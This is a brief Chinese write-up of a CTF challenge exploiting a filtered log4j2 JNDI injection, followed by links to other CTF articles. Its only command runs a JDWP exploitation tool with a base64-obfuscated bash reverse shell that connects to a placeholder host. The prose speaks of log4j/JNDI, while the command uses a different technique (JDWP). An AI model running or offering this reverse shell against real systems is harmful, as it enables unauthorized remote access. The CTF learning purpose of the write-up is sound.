2022 Real World CTF 体验赛 writeup

log4flag

最近风靡全球的log4j2漏洞,加了一个正则过滤

用log4j自带的语法便轻松绕过,然后常规jndi注入攻击,需要一台在公网的vps

在自己vps上使用工具搭建ldap服务

https://github.com/cash2one/jdwp-exec

python2 jdwp.py -t 139.196.23.201 -p 8888 --break-on "java.lang.String.indexof" --cmd "bash -c {echo,MDwmMTk2O2V4ZWMgMTk2PD4vZGV2L3RjcC94LngueC54LzExMTExOyBiYXNoIDwmMTk2ID4mMTk2IDI+JjE5Ng==}|{base64,-d}|{bash,-i}"

CTFweb安全

相关

XCTF---easyjni的WriteUp

Youngter-drive(BUUCTF)

CTF入门学习3->Web通信基础

ctfshow web入门信息收集

Bugku CTF练习题---MISC---telnet

快速搭建Web安全测试环境

XCTF练习题---MISC---就在其中

XCTF练习题---MISC---normal_png

XCTF练习题---CRYPTO---wtc_rsa_bbq

bcloud_bctf_2016(house of force)

bcloud_bctf_2016(house of force)

BUU-CTF[CISCN2019 华东南赛区]Web11

标签